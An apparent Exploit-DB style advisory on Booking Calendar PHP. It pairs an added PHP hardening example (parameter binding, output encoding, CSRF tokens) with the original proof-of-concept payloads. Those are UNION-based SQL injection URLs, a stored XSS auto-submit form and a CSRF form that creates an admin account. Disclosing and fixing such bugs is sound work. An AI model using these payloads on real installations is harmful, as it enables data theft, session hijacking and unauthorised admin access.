Vendor: Booking Calendar PHP
By: AtT4CKxT3rR0r1ST
CVSS: 8.8 (HIGH)
Title: Multiple SQL Injection, Cross Site Scripting, Cross Site Request Forgery
CWE: 89, 79, 352
Product Name: Booking Calendar PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2020

Booking Calendar PHP – Multiple Vulnerabilities

Multiple SQL Injection: An attacker can inject malicious SQL queries into the vulnerable web application.
Cross Site Scripting: An attacker can inject malicious JavaScript code into the vulnerable web application.
Cross Site Request Forgery: An attacker can send a malicious request to the vulnerable web application.

Mitigation:

Input validation, output encoding, whitelisting, token-based authentication, CSRF tokens, CAPTCHA, etc.
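The following is an added example, not code from the Booking Calendar PHP project, showing what the mitigations above look like in PHP for the three bug classes in this advisory: an integer-whitelisted, parameter-bound lookup for the `id` query parameter, HTML output encoding for the calendar `name` field, and a per-session CSRF token checked before `user_add.php` creates an account. The endpoint and parameter names come from the advisory; the table and column names, the in-memory SQLite database and the sample data are assumptions constructed for the demo.

```php
<?php
// Added example, not code from the Booking Calendar PHP project: a hardened
// handler sketch for the three bug classes in the advisory. The endpoint and
// parameter names (get_code.php?id=, the calendar "name" field, user_add.php)
// are taken from the advisory; table and column names are assumptions.
declare(strict_types=1);

// [1] SQL injection: never splice ?id= into the query text. Reject anything
// that is not a plain integer, then bind the value in a prepared statement.
function fetchCalendarById(PDO $db, string $rawId): ?array
{
    if (!preg_match('/^[0-9]{1,10}$/', $rawId)) {
        return null; // "null' and 1=2 union select ..." never reaches SQL
    }
    $stmt = $db->prepare('SELECT id, name FROM calendars WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// [2] Cross-site scripting: store the name as given, but encode it for the
// HTML context every time it is written into a page.
function renderCalendarName(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>' . $safe . '</h1>';
}

// [3] CSRF: a random per-session token is embedded in the user_add form as a
// hidden input and must be echoed back in the POST; comparison is constant-time.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrfTokenValid(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

function handleUserAdd(PDO $db, array $session, array $post): string
{
    if (!csrfTokenValid($session, $post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false || !isset($post['name'], $post['password'])) {
        return 'rejected: invalid input';
    }
    $stmt = $db->prepare(
        'INSERT INTO users (name, email, password_hash) VALUES (:n, :e, :p)'
    );
    $stmt->execute([
        ':n' => $post['name'],
        ':e' => $email,
        ':p' => password_hash($post['password'], PASSWORD_DEFAULT),
    ]);
    return 'user added';
}

// Demo on an in-memory SQLite database with constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE calendars (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password_hash TEXT)');
$db->exec("INSERT INTO calendars (id, name) VALUES (2, 'Summer 2020')");

var_dump(fetchCalendarById($db, '2'));                                           // the real row
var_dump(fetchCalendarById($db, "null' and 1=2 union select 1,2,version(),4,5,6--")); // NULL
echo renderCalendarName('<script>alert(document.cookie);</script>'), PHP_EOL;   // tags are encoded

$session = [];
$token = issueCsrfToken($session);
$forged = ['name' => 'iphobos', 'email' => 'email@hotmail.com', 'password' => '123456'];
echo handleUserAdd($db, $session, $forged), PHP_EOL;                              // cross-site POST: rejected
echo handleUserAdd($db, $session, $forged + ['csrf_token' => $token]), PHP_EOL;  // own form: user added
```

Two points the advisory's PoCs make worth checking in a real fix: the stored name must be encoded at every place it is rendered, not only on the page the PoC targets, and the CSRF token must be checked on every state-changing handler, not just `user_add.php`; marking the session cookie `SameSite=Lax` or `Strict` adds a second layer against the cross-site auto-submitting form.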

Exploit-DB raw data:

Booking Calendar PHP - Multiple Vulnerabilities
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.sajt-trgovina.com/booking_calendar/
####################################################################

[1] Multiple Sql Injection
===========================

http://site/calendare/get_code.php?id=null'+and+1=2+union+select+1,2,version(),4,5,6---
http://site/calendare/read_answer.php?id=null+and+1=2+union+select+1,2,3,4,5,6,version(),8,9,10
http://site/calendare/edit_calendar.php?id=null'+and+1=2+union+select+1,version(),3,4,5,6---

[2] Cross Site Scripting
=========================

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/">
<input type="hidden" name="id_template" value="2"/>
<input type="hidden" name="name"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="save_new_calendar" value="Save new calendar"/>
</form>
</body>
</html>

[3] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/user_add.php">
<input type="hidden" name="name" value="iphobos"/>
<input type="hidden" name="email" value="email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="user_add" value="Save changes"/>
</form>
</body>
</html>


####################################################################